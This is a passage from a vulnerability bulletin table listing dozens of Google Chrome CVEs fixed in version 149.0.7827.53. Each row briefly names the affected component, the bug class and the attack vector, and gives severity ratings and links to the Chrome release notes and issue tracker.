| Google--Chrome | Inappropriate implementation in XML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11169 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502285273 |
| Google--Chrome | Inappropriate implementation in Chromoting in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to perform OS-level privilege escalation via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11170 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502322596 |
| Google--Chrome | Integer overflow in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11171 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502322843 |
| Google--Chrome | Incorrect security UI in Contact Picker in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11172 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502328201 |
| Google--Chrome | Out of bounds write in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11173 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502337304 |
| Google--Chrome | Inappropriate implementation in Site Isolation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11174 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502348223 |
| Google--Chrome | Incorrect security UI in Messages in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11175 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502368088 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11176 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502371717 |
| Google--Chrome | Use after free in Omnibox in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11177 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502449864 |
| Google--Chrome | Insufficient policy enforcement in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11178 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502501810 |
| Google--Chrome | Inappropriate implementation in ORB in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11179 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502615170 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11180 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502631225 |
| Google--Chrome | Inappropriate implementation in Media Session in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11181 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502633299 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11182 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502651014 |
| Google--Chrome | Out of bounds read in GWP-ASan in Google Chrome prior to 149.0.7827.53 allowed a local attacker to obtain potentially sensitive information from process memory via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11183 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502768780 |
| Google--Chrome | Insufficient policy enforcement in Actor in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11184 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502777516 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11185 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502784366 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11186 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502805170 |
| Google--Chrome | Inappropriate implementation in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11187 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502819675 |
| Google--Chrome | Use after free in USB in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11188 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502959826 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11189 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503197481 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass discretionary access control via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11190 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503375371 |
| Google--Chrome | Out of bounds memory access in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11191 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503392431 |
| Google--Chrome | Insufficient validation of untrusted input in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11192 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503490678 |
| Google--Chrome | Insufficient policy enforcement in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11193 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503642586 |
| Google--Chrome | Inappropriate implementation in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11194 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503719488 |
| Google--Chrome | Inappropriate implementation in MHTML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11195 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503865896 |
| Google--Chrome | Type Confusion in XML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11196 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503879106 |
| Google--Chrome | Insufficient policy enforcement in Workers in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11197 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504073872 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11198 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504395300 |
| Google--Chrome | Inappropriate implementation in WebRTC in Google Chrome prior to 149.0.7827.53 allowed an attacker in a privileged network position to leak cross-origin data via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11199 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504572664 |
| Google--Chrome | Inappropriate implementation in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11200 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504579798 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11201 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505068950 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11202 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505144022 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11203 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505192638 |
| Google--Chrome | Inappropriate implementation in Signin in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11204 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505200733 |
| Google--Chrome | Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted QR code. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11205 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505290253 |
| Google--Chrome | Insufficient policy enforcement in ServiceWorker in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11206 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505427216 |
| Google--Chrome | Insufficient validation of untrusted input in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11207 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506127858 |
| Google--Chrome | Use after free in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11208 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506387278 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11209 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506391032 |
| Google--Chrome | Inappropriate implementation in Safe Browsing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted RAR file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11210 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506473226 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11211 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506629455 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11212 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507216833 |
| Google--Chrome | Insufficient validation of untrusted input in Reading Mode in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11213 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507382702 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11214 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508257850 |
| Google--Chrome | Inappropriate implementation in Cronet in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11215 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513446116 |
| Google--Chrome | Incorrect security UI in File Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11216 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/474583539 |
| Google--Chrome | Inappropriate implementation in Fenced Frames in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11217 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487564032 |
| Google--Chrome | Inappropriate implementation in PlatformIntegration in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11218 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/476862276 |
| Google--Chrome | Inappropriate implementation in Navigation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11219 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/480074849 |
| Google--Chrome | Insufficient validation of untrusted input in Navigation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11220 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487300831 |
| Google--Chrome | Insufficient validation of untrusted input in PointerLock in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11221 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492211919 |
| Google--Chrome | Incorrect security UI in Tab Strip in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11222 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/458442542 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11223 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494800494 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11224 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502461760 |
| Google--Chrome | Inappropriate implementation in WebUI in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11225 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503346647 |
| Google--Chrome | Insufficient policy enforcement in PreviewTab in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11226 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/385662278 |
| Google--Chrome | Incorrect security UI in Tab Hover Cards in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11227 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/448421954 |
| Google--Chrome | Inappropriate implementation in File Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11228 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/454484864 |
| Google--Chrome | Inappropriate implementation in Enterprise in Google Chrome prior to 149.0.7827.53 allowed a local attacker to perform privilege escalation via physical access to the device. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11229 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/482713603 |
| Google--Chrome | Use after free in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11230 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493225428 |
| Google--Chrome | Inappropriate implementation in Safe Browsing in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11231 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495840862 |
| Google--Chrome | Inappropriate implementation in TabGroups in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11232 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495981782 |
| Google--Chrome | Insufficient policy enforcement in FoldableAPIs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11233 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496088449 |
| Google--Chrome | Inappropriate implementation in FoldableAPIs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11234 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496095145 |
| Google--Chrome | Insufficient policy enforcement in Compositing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11235 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496419374 |
| Google--Chrome | Insufficient policy enforcement in Web Bluetooth in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11236 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496427030 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11237 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496617698 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11238 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496705691 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11239 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497025738 |
| Google--Chrome | Insufficient validation of untrusted input in Loader in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11240 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497030032 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11241 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497203741 |
| Google--Chrome | Insufficient validation of untrusted input in Plugins in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11242 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497385823 |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11243 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497394061 |
| Google--Chrome | Insufficient validation of untrusted input in WebAuthentication in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11244 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497609145 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11245 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497610654 |
| Google--Chrome | Insufficient validation of untrusted input in IndexedDB in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11246 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497660733 |
| Google--Chrome | Insufficient policy enforcement in CustomTabs in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11247 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497865734 |
| Google--Chrome | Inappropriate implementation in Google Lens in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11248 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497946941 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11249 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497989379 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11250 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498281224 |
| Google--Chrome | Insufficient policy enforcement in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11251 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498301853 |
| Google--Chrome | Insufficient policy enforcement in Content Settings in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11252 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498373018 |
| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11253 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498397912 |
